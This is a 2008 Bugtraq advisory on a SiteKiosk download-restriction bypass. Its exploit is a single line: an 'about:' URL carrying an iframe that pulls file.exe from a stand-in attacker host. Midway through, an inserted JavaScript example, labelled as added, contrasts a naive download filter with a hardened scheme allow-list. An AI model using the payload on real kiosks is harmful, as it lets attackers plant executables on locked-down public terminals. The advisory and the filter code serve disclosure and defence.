
List:       bugtraq
Subject:    Proviso SiteKiosk File Download Vulnerability
From:       nebelfrost23 () web ! de
Date:       2008-03-29 22:08:56
Message-ID: 20080329220856.2538.qmail () securityfocus ! com


[>>] Proviso SiteKiosk File Download Vulnerability [<<]


[x] Vendor Information:

"SiteKiosk is software for public access internet terminals and lets you turn any
computer into a secure multilanguage Internet terminal (already 20 different
languages included), allowing the user to access the Internet but protecting the
underlying operating system and files. Possible uses include presentations,
exhibitions, libraries, and more. SiteKiosk works with normal displays and
touchscreens. A keyboard doesn't even have to be attached; text can be entered via
a keypad with a mouse. Plentiful options let you decide the amount of security your
kiosk needs, from hard-disk protection to prohibiting specific websites. The program
can be used with either a direct network connection or Dial-Up Networking, providing
Internet access "on demand." Other features include multiple-window support,
automatic shutdown/restart, shell replacement, hard-disk protection, thorough
event-logging support, a log-out button, content advisor, great website filtering (with
automatic update), an easy-to-use configuration wizard, and more. SiteKiosk
supports different payment methods like coin machines, bill acceptors, smart cards
and others. Also very nice is the webcam support, which enables users to send voice,
video and photo emails. It is also possible to administer terminals remotely.
SiteKiosk uses Internet Explorer as its basis but presents a much simplified
interface that even the novice user will understand. Excellent online help is
included."

[x] Attack Information

SiteKiosk tries to block file downloads. If you click a link that would save a file
to the hard drive (e.g. a link to an .exe) or right-click something and select
"Save as...", a window pops up saying that downloading the file is not possible.
This restriction can be bypassed with a special URL: the "about:" URL. SiteKiosk
uses the Microsoft Internet Explorer engine to display web sites, and Internet
Explorer renders whatever follows "about:" directly from the URL. For example,
"about:hello" displays the text "hello" in the browser. HTML works too:
"about:<b>hello</b>" displays the text "hello" in bold. Normally this is harmless,
but in SiteKiosk it means arbitrary markup can be injected through the address bar
without ever loading a page from the network. The download block looks at what the
user navigates to; an "about:" URL carrying an <iframe> whose src points at an
executable is not recognized as a download, yet the iframe fetches the file.

[x] Exploit

Just access this url:

about:<iframe src="http://www.attacker.com/file.exe"></iframe>
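The following is an added example, not code from the advisory or from SiteKiosk. It models the gap the advisory describes: a download filter that keys on the file extension of the URL the user navigates to never sees the .exe, because the executable's address is hidden inside markup carried by an "about:" URL. The function names, the sample navigations and the extension list are all constructed for illustration. The hardened variant allow-lists schemes first (only http and https) and also extracts any embedded src/href targets so they can be run through the same check; a real kiosk would additionally need to special-case "about:blank" if its own UI relies on it.

```javascript
// Added example (not SiteKiosk code): URL-level download filtering vs. the about: vector.
// All names and sample inputs below are constructed for this illustration.

// Constructed sample navigations; the third is the payload from the advisory.
const SAMPLE_NAVIGATIONS = [
  "http://www.example.com/index.html",
  "http://www.attacker.com/file.exe",
  'about:<iframe src="http://www.attacker.com/file.exe"></iframe>',
  "about:blank",
  "javascript:alert(1)",
];

// Hypothetical block list of "download" extensions a naive kiosk filter might use.
const BLOCKED_EXTENSIONS = [".exe", ".msi", ".bat", ".cmd", ".scr"];
const ALLOWED_SCHEMES = ["http", "https"];

// Returns the URL scheme in lower case, or null when there is none.
// Inputs are assumed to be absolute URLs (the browser has already resolved relative ones).
function schemeOf(url) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// True when the path part (before ? or #) ends in a blocked extension.
function hasBlockedExtension(url) {
  const path = url.split(/[?#]/)[0].toLowerCase();
  return BLOCKED_EXTENSIONS.some((ext) => path.endsWith(ext));
}

// Naive filter: only inspects the extension of the URL being navigated to.
// This is the behaviour the advisory bypasses: about:<iframe ...></iframe> does not
// end in .exe, so it is allowed even though the iframe will fetch file.exe.
function naiveDownloadFilter(url) {
  if (hasBlockedExtension(url)) {
    return { allow: false, reason: "blocked extension" };
  }
  return { allow: true, reason: "no blocked extension in URL" };
}

// Pulls src=/href= targets out of markup so they can be checked like any other URL.
function embeddedUrls(markup) {
  const found = [];
  const re = /\b(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(markup)) !== null) {
    found.push(m[1]);
  }
  return found;
}

// Hardened filter: (1) refuse every scheme that is not http/https, which kills
// about:, javascript:, file: and friends outright; (2) apply the extension check to
// the URL itself and to anything it embeds.
function hardenedFilter(url) {
  const scheme = schemeOf(url);
  if (scheme === null || !ALLOWED_SCHEMES.includes(scheme)) {
    return { allow: false, reason: `scheme not allowed: ${scheme}` };
  }
  const candidates = [url, ...embeddedUrls(url)];
  for (const candidate of candidates) {
    if (hasBlockedExtension(candidate)) {
      return { allow: false, reason: `blocked extension in ${candidate}` };
    }
  }
  return { allow: true, reason: "http(s) URL without blocked extension" };
}

// Side-by-side verdicts for one navigation.
function evaluate(url) {
  return {
    url,
    naive: naiveDownloadFilter(url).allow,
    hardened: hardenedFilter(url).allow,
  };
}

// Stand-alone demo: prints the verdict table for the constructed samples.
for (const nav of SAMPLE_NAVIGATIONS) {
  console.log(evaluate(nav));
}
```

Running the block shows the naive filter blocking the direct link to file.exe but allowing the about: payload, while the hardened filter refuses the about: payload on scheme alone and would also catch the embedded executable if the scheme check were ever relaxed. The scheme allow-list is the primary control; the embedded-URL scan is defence in depth for markup that reaches the engine by some other route.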

[x] Patch

None

[x] Credits

The vulnerability has been discovered by katharsis - www.katharsis.x2.to

